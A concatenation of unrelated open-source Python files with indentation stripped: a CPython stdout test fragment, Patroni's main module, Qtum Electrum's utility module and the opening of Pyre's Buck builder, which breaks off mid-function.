sys.stdout = save_stdout
def test_del_stdout_before_print(self):
# Issue 4597: 'print' with no argument wasn't reporting when
# sys.stdout was deleted.
save_stdout = sys.stdout
del sys.stdout
try:
print()
except RuntimeError as e:
self.assertEqual(str(e), "lost sys.stdout")
else:
self.fail("Expected RuntimeError")
finally:
sys.stdout = save_stdout
def test_unicode(self):
import subprocess
def get_message(encoding, *code):
code = ';'.join(code) # jython.bat cannot cope with '\n' in arguments
env = os.environ.copy()
env['PYTHONIOENCODING'] = encoding
process = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, env=env)
stdout, stderr = process.communicate()
self.assertEqual(process.returncode, 0)
return stdout
def check_message(text, encoding, expected):
stdout = get_message(encoding,
"import sys",
"sys.stdout.write(%r)" % text,
"sys.stdout.flush()")
self.assertEqual(stdout, expected)
# test the encoding
check_message('15\u20ac', "iso-8859-15", "15\xa4")
check_message('15\u20ac', "utf-8", '15\xe2\x82\xac')
check_message('15\u20ac', "utf-16-le", '1\x005\x00\xac\x20')
# test the error handler
check_message('15\u20ac', "iso-8859-1:ignore", "15")
check_message('15\u20ac', "iso-8859-1:replace", "15?")
check_message('15\u20ac', "iso-8859-1:backslashreplace", "15\\u20ac")
# test the buffer API
for objtype in ('buffer', 'bytearray'):
stdout = get_message('ascii',
'import sys',
r'sys.stdout.write(%s("\xe9"))' % objtype,
'sys.stdout.flush()')
self.assertEqual(stdout, "\xe9")
def test_main():
run_unittest(
AutoFileTests,
OtherFileTests,
FileSubclassTests,
FileThreadingTests,
StdoutTests
)
if __name__ == '__main__':
test_main()
|
__init__.py
|
import logging
import os
import signal
import sys
import time
logger = logging.getLogger(__name__)
class Patroni(object):
def __init__(self):
from patroni.api import RestApiServer
from patroni.config import Config
from patroni.dcs import get_dcs
from patroni.ha import Ha
from patroni.log import PatroniLogger
from patroni.postgresql import Postgresql
from patroni.request import PatroniRequest
from patroni.version import __version__
from patroni.watchdog import Watchdog
self.setup_signal_handlers()
self.version = __version__
self.logger = PatroniLogger()
self.config = Config()
self.logger.reload_config(self.config.get('log', {}))
self.dcs = get_dcs(self.config)
self.watchdog = Watchdog(self.config)
self.load_dynamic_configuration()
self.postgresql = Postgresql(self.config['postgresql'])
self.api = RestApiServer(self, self.config['restapi'])
self.request = PatroniRequest(self.config, True)
self.ha = Ha(self)
self.tags = self.get_tags()
self.next_run = time.time()
self.scheduled_restart = {}
def load_dynamic_configuration(self):
from patroni.exceptions import DCSError
while True:
try:
cluster = self.dcs.get_cluster()
if cluster and cluster.config and cluster.config.data:
if self.config.set_dynamic_configuration(cluster.config):
self.dcs.reload_config(self.config)
self.watchdog.reload_config(self.config)
elif not self.config.dynamic_configuration and 'bootstrap' in self.config:
if self.config.set_dynamic_configuration(self.config['bootstrap']['dcs']):
self.dcs.reload_config(self.config)
break
except DCSError:
logger.warning('Cannot get cluster from DCS')
time.sleep(5)
def get_tags(self):
return {tag: value for tag, value in self.config.get('tags', {}).items()
if tag not in ('clonefrom', 'nofailover', 'noloadbalance', 'nosync') or value}
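# For example (hypothetical config): with tags {'nofailover': False,
# 'datacenter': 'dc1'}, get_tags() returns {'datacenter': 'dc1'}; the four
# boolean tags listed above are dropped when their value is falsy.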
@property
def nofailover(self):
return bool(self.tags.get('nofailover', False))
@property
def nosync(self):
return bool(self.tags.get('nosync', False))
def reload_config(self, sighup=False):
try:
self.tags = self.get_tags()
self.logger.reload_config(self.config.get('log', {}))
self.watchdog.reload_config(self.config)
if sighup:
self.request.reload_config(self.config)
self.api.reload_config(self.config['restapi'])
self.postgresql.reload_config(self.config['postgresql'], sighup)
self.dcs.reload_config(self.config)
except Exception:
logger.exception('Failed to reload config_file=%s', self.config.config_file)
@property
def replicatefrom(self):
return self.tags.get('replicatefrom')
def sighup_handler(self, *args):
self._received_sighup = True
def sigterm_handler(self, *args):
with self._sigterm_lock:
if not self._received_sigterm:
self._received_sigterm = True
sys.exit()
@property
def noloadbalance(self):
return bool(self.tags.get('noloadbalance', False))
def schedule_next_run(self):
self.next_run += self.dcs.loop_wait
current_time = time.time()
nap_time = self.next_run - current_time
if nap_time <= 0:
self.next_run = current_time
# Release the GIL so we don't starve anyone waiting on async_executor lock
time.sleep(0.001)
# Warn user that Patroni is not keeping up
logger.warning("Loop time exceeded, rescheduling immediately.")
elif self.ha.watch(nap_time):
self.next_run = time.time()
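# In other words: next_run normally advances by dcs.loop_wait each cycle; if a
# cycle overruns, a warning is logged and the next run is scheduled
# immediately, and if ha.watch() returns early the schedule resets to now.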
@property
def received_sigterm(self):
with self._sigterm_lock:
return self._received_sigterm
def run(self):
self.api.start()
self.logger.start()
self.next_run = time.time()
while not self.received_sigterm:
if self._received_sighup:
self._received_sighup = False
if self.config.reload_local_configuration():
self.reload_config(True)
else:
self.postgresql.config.reload_config(self.config['postgresql'], True)
logger.info(self.ha.run_cycle())
if self.dcs.cluster and self.dcs.cluster.config and self.dcs.cluster.config.data \
and self.config.set_dynamic_configuration(self.dcs.cluster.config):
self.reload_config()
if self.postgresql.role != 'uninitialized':
self.config.save_cache()
self.schedule_next_run()
def setup_signal_handlers(self):
from threading import Lock
self._received_sighup = False
self._sigterm_lock = Lock()
self._received_sigterm = False
if os.name != 'nt':
signal.signal(signal.SIGHUP, self.sighup_handler)
signal.signal(signal.SIGTERM, self.sigterm_handler)
def shutdown(self):
with self._sigterm_lock:
self._received_sigterm = True
try:
self.api.shutdown()
except Exception:
logger.exception('Exception during RestApi.shutdown')
self.ha.shutdown()
self.logger.shutdown()
def patroni_main():
patroni = Patroni()
try:
patroni.run()
except KeyboardInterrupt:
pass
finally:
patroni.shutdown()
def fatal(string, *args):
sys.stderr.write('FATAL: ' + string.format(*args) + '\n')
sys.exit(1)
def check_psycopg2():
min_psycopg2 = (2, 5, 4)
min_psycopg2_str = '.'.join(map(str, min_psycopg2))
def parse_version(version):
for e in version.split('.'):
try:
yield int(e)
except ValueError:
break
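# e.g. tuple(parse_version('2.8.6')) == (2, 8, 6); a non-numeric component,
# as in '2.8.6.dev0', stops the parse at the first non-integer part.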
try:
import psycopg2
version_str = psycopg2.__version__.split(' ')[0]
version = tuple(parse_version(version_str))
if version < min_psycopg2:
fatal('Patroni requires psycopg2>={0}, but only {1} is available', min_psycopg2_str, version_str)
except ImportError:
fatal('Patroni requires psycopg2>={0} or psycopg2-binary', min_psycopg2_str)
def main():
check_psycopg2()
if os.getpid() != 1:
return patroni_main()
# Patroni was started with PID=1, so it looks like we are running inside a container
pid = 0
# Since we appear to be inside a Docker container, act like an init process and reap orphaned children
def sigchld_handler(signo, stack_frame):
try:
while True:
ret = os.waitpid(-1, os.WNOHANG)
if ret == (0, 0):
break
elif ret[0] != pid:
logger.info('Reaped pid=%s, exit status=%s', *ret)
except OSError:
pass
def passtochild(signo, stack_frame):
if pid:
os.kill(pid, signo)
if os.name != 'nt':
signal.signal(signal.SIGCHLD, sigchld_handler)
signal.signal(signal.SIGHUP, passtochild)
signal.signal(signal.SIGQUIT, passtochild)
signal.signal(signal.SIGUSR1, passtochild)
signal.signal(signal.SIGUSR2, passtochild)
signal.signal(signal.SIGINT, passtochild)
signal.signal(signal.SIGABRT, passtochild)
signal.signal(signal.SIGTERM, passtochild)
import multiprocessing
patroni = multiprocessing.Process(target=patroni_main)
patroni.start()
pid = patroni.pid
patroni.join()
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
import time
from collections import defaultdict
from datetime import datetime
from decimal import Decimal
import traceback
import urllib
import urllib.request, urllib.parse, urllib.error
import queue
import threading
import hmac
from struct import Struct
import webbrowser
import stat
from typing import NamedTuple
import inspect
from locale import localeconv
from .i18n import _
import aiohttp
from aiohttp_socks import SocksConnector, SocksVer
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'QTUM':8, 'mQTUM':5, 'uQTUM':2}
fee_levels = [_('Within 25 blocks'), _('Within 10 blocks'), _('Within 5 blocks'), _('Within 2 blocks'), _('In the next block')]
unpack_int32_from = Struct('<i').unpack_from
unpack_int64_from = Struct('<q').unpack_from
unpack_uint16_from = Struct('<H').unpack_from
unpack_uint32_from = Struct('<I').unpack_from
unpack_uint64_from = Struct('<Q').unpack_from
class NotEnoughFunds(Exception): pass
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
class FileImportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to import from file.") + "\n" + self.message
class FileExportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to export to file.") + "\n" + self.message
class TimeoutException(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
if not self.message:
return _("Operation timed out.")
return self.message
class WalletFileException(Exception): pass
class QtumException(Exception): pass
# Raise this exception to unwind the stack just as when an error occurs;
# unlike other exceptions, however, the user will not be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class Fiat(object):
def __new__(cls, value, ccy):
self = super(Fiat, cls).__new__(cls)
self.ccy = ccy
self.value = value
return self
def __repr__(self):
return 'Fiat(%s)' % self.__str__()
def __str__(self):
if self.value.is_nan():
return _('No Data')
else:
return "{:.2f}".format(self.value) + ' ' + self.ccy
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
if isinstance(obj, set):
return list(obj)
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
verbosity_filter = ''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
if self.verbosity_filter in verbosity or verbosity == '*':
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_stderr(self, *msg):
print_stderr("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
verbosity_filter = 'd'
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
verbosity = '*'
def set_verbosity(b):
global verbosity
verbosity = b
def print_error(*args):
if not verbosity: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def get_func_name(args):
arg_names_from_sig = inspect.getfullargspec(func).args
# prepend class name if there is one (and if we can find it)
if len(arg_names_from_sig) > 0 and len(args) > 0 \
and arg_names_from_sig[0] in ('self', 'cls', 'klass'):
classname = args[0].__class__.__name__
else:
classname = ''
name = '{}.{}'.format(classname, func.__name__) if classname else func.__name__
return name
def do_profile(args, kw_args):
name = get_func_name(args)
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", name, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(args, kw_args)
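# Illustrative usage of the profiler decorator (a minimal sketch; MyJob and heavy_work
# are hypothetical names, not part of this module):
#
#   class MyJob(PrintError):
#       @profiler
#       def heavy_work(self):
#           ...
#
# Calling MyJob().heavy_work() prints a line such as
# "[profiler] MyJob.heavy_work 0.1234" to stderr via print_error(), provided
# verbosity is enabled.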
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.qtum.qtum_electrum'
if not os.path.exists(d):
os.mkdir(d)
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/qtum_electrum'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_datadir_available(config_path):
path = config_path
if os.path.exists(path):
return
else:
raise FileNotFoundError(
'Electrum datadir does not exist. Was it deleted while running?' + '\n' +
'Should be at {}'.format(path))
def assert_file_in_datadir_available(path, config_path):
if os.path.exists(path):
return
else:
assert_datadir_available(config_path)
raise FileNotFoundError(
'Cannot find file but datadir is there.' + '\n' +
'Should be at {}'.format(path))
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
cast a string to a bytes-like object; bytearray input is copied into bytes
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".qtum-electrum")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Qtum-Electrum")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Qtum-Electrum")
else:
#raise Exception("No home directory found in environment variables.")
return
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
DECIMAL_POINT = localeconv()['decimal_point']
def format_satoshis(x, num_zeros=0, decimal_point=8, precision=None, is_diff=False, whitespaces=False):
from locale import localeconv
if x is None:
return 'unknown'
if precision is None:
precision = decimal_point
decimal_format = ".0" + str(precision) if precision > 0 else ""
if is_diff:
decimal_format = '+' + decimal_format
result = ("{:" + decimal_format + "f}").format(x / pow (10, decimal_point)).rstrip('0')
integer_part, fract_part = result.split(".")
dp = DECIMAL_POINT
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
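# Illustrative results, assuming the locale decimal point is '.':
#   format_satoshis(1230000)                -> '0.0123'
#   format_satoshis(1230000, num_zeros=8)   -> '0.01230000'
#   format_satoshis(1230000, is_diff=True)  -> '+0.0123'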
FEERATE_PRECISION = 1 # num fractional decimal places for sat/byte fee rates
_feerate_quanta = Decimal(10) ** (-FEERATE_PRECISION)
def format_fee_satoshis(fee, num_zeros=0):
return format_satoshis(fee, num_zeros, 0, precision=FEERATE_PRECISION)
def timestamp_to_datetime(timestamp):
if timestamp is None:
return None
try:
return datetime.fromtimestamp(timestamp)
except:
return None
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
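# Illustrative results (relative to the current time; time is imported later in this module):
#   age(time.time() - 20)    -> 'less than a minute ago'
#   age(time.time() - 3600)  -> 'about 1 hour ago'
#   age(time.time() + 7200)  -> 'in about 2 hours'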
def block_explorer_info():
from . import constants
from .qtum import testnet_block_explorers, mainnet_block_explorers
if constants.net.TESTNET:
return testnet_block_explorers
else:
return mainnet_block_explorers
def block_explorer(config):
bbb = config.get('block_explorer', 'explorer.qtum.org')
return bbb
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, params):
"""
:param config:
:type params: dict
:return: str
"""
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
if params.get('token'):
if 'qtum.org' in be_tuple[0]:
return "{}/token/{}?a={}".format(be_tuple[0], params.get('token'), params.get('addr'))
url_parts = [be_tuple[0], ]
for k, v in params.items():
kind_str = be_tuple[1].get(k)
if not kind_str:
continue
url_parts.append(kind_str)
url_parts.append(v)
return "/".join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise Exception("Not a qtum address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'qtum':
raise Exception("Not a qtum URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise Exception("Invalid qtum address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
m = re.match(r'([0-9.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
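# Illustrative example (the address is a placeholder and COIN is assumed to be 10**8):
#   parse_URI('qtum:Qexample...?amount=1.5&message=donation')
#   -> {'amount': 150000000, 'message': 'donation',
#       'address': 'Qexample...', 'memo': 'donation'}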
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='qtum', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
class timeout(Exception):
pass
import socket
import errno
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
# print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
def versiontuple(v):
return tuple(map(int, (v.split("."))))
def import_meta(path, validater, load_meta):
try:
with open(path, 'r', encoding='utf-8') as f:
d = validater(json.loads(f.read()))
load_meta(d)
# backwards compatibility for JSONDecodeError
except ValueError:
traceback.print_exc(file=sys.stderr)
raise FileImportFailed(_("Invalid JSON code."))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
raise FileImportFailed(e)
def export_meta(meta, file_name):
try:
with open(file_name, 'w+', encoding='utf-8') as f:
json.dump(meta, f, indent=4, sort_keys=True)
except (IOError, os.error) as e:
traceback.print_exc(file=sys.stderr)
raise FileExportFailed(e)
def open_browser(url, new=0, autoraise=True):
return webbrowser.open(url, new, autoraise)
def make_dir(path, allow_symlink=True):
"""Make directory if it does not yet exist."""
if not os.path.exists(path):
if not allow_symlink and os.path.islink(path):
raise Exception('Dangling link: ' + path)
os.mkdir(path)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
TxMinedStatus = NamedTuple("TxMinedStatus", [("height", int),
("conf", int),
("timestamp", int),
("header_hash", str)])
VerifiedTxInfo = NamedTuple("VerifiedTxInfo", [("height", int),
("timestamp", int),
("txpos", int),
("header_hash", str)])
def print_frames(depth=10):
print("--------------------")
for i in range(1, depth):
try:
frame = sys._getframe(i)
print(frame.f_code.co_name, frame.f_code.co_filename, frame.f_lineno)
except ValueError:
return
def make_aiohttp_session(proxy):
if proxy:
connector = SocksConnector(
socks_ver=SocksVer.SOCKS5 if proxy['mode'] == 'socks5' else SocksVer.SOCKS4,
host=proxy['host'],
port=int(proxy['port']),
username=proxy.get('user', None),
password=proxy.get('password', None),
rdns=True
)
return aiohttp.ClientSession(headers={'User-Agent' : 'Qtum Electrum'}, timeout=aiohttp.ClientTimeout(total=10), connector=connector)
else:
return aiohttp.ClientSession(headers={'User-Agent' : 'Qtum Electrum'}, timeout=aiohttp.ClientTimeout(total=10))
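# Illustrative usage (a minimal sketch; the proxy values are placeholders):
#   proxy = {'mode': 'socks5', 'host': '127.0.0.1', 'port': '9050',
#            'user': None, 'password': None}
#   async with make_aiohttp_session(proxy) as session:
#       async with session.get('https://example.com') as resp:
#           text = await resp.text()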
|
buck.py
|
# Copyright 2004-present Facebook. All rights reserved.
# pyre-unsafe
import functools
import glob
import json
import logging
import os
import subprocess
import sys
import tempfile
import threading
from collections import namedtuple
from json.decoder import JSONDecodeError
from typing import Dict, Iterable, List, Optional, Set, Tuple, cast # noqa
from .filesystem import BuckBuilder, find_root
LOG = logging.getLogger(__name__)
CACHE_PATH = ".pyre/buckcache.json"
BuckOut = namedtuple("BuckOut", "source_directories targets_not_found")
class BuckException(Exception):
pass
class FastBuckBuilder(BuckBuilder):
def __init__(
self,
buck_root: str,
output_directory: Optional[str] = None,
buck_builder_binary: Optional[str] = None,
buck_builder_target: Optional[str] = None,
debug_mode=False,
) -> None:
self._buck_root = buck_root
self._output_directory = output_directory or tempfile.mkdtemp(
prefix="pyre_tmp_"
)
self._buck_builder_binary = buck_builder_binary
self._buck_builder_target = buck_builder_target
self._debug_mode = debug_mode
self.conflicting_files = []
self.unsupported_files = []
def _get_builder_executable(self) -> str:
builder_binary = self._buck_builder_binary
if not self._debug_mode:
if builder_binary is None:
raise BuckException(
"--buck-builder-binary must be provided "
"if --buck-builder-debug is not enabled."
)
return builder_binary
target = self._buck_builder_target
if target is None:
raise BuckException(
"--buck-builder-target must be provided "
"if --buck-builder-debug is enabled."
)
binary_relative_path = (
subprocess.check_output(
[
"buck",
"build",
"--show-output",
"//tools/pyre/facebook/fb_buck_project_builder",
],
stderr=subprocess.DEVNULL,
)
.decode()
.strip()
.split(" ")[1]
)
return os.path.join(self._buck_root, binary_relative_path)
def build(self, targets: Iterable[str]) -> List[str]:
command = [
self._get_builder_executable(),
"-J-Djava.net.preferIPv6Addresses=true",
"-J-Djava.net.preferIPv6Stack=true",
"--buck_root",
self._buck_root,
"--output_directory",
self._output_directory,
] + list(targets)
if self._debug_mode:
command.append("--debug")
with subprocess.Popen(
command, stdout=subprocess.PIPE, stderr=subprocess.PIPE
) as buck_builder_process:
# Java's logging conflicts with Python's logging, so we capture the
# logs and re-log them with Python's logger.
log_processor = threading.Thread(
target=self._read_stderr, args=(buck_builder_process.stderr,)
)
log_processor.daemon = True
log_processor.start()
return_code = buck_builder_process.wait()
# Wait until all stderr output has been printed.
log_processor.join()
if return_code == 0:
LOG.info("Finished building targets.")
if self._debug_mode:
debug_output = json.loads(
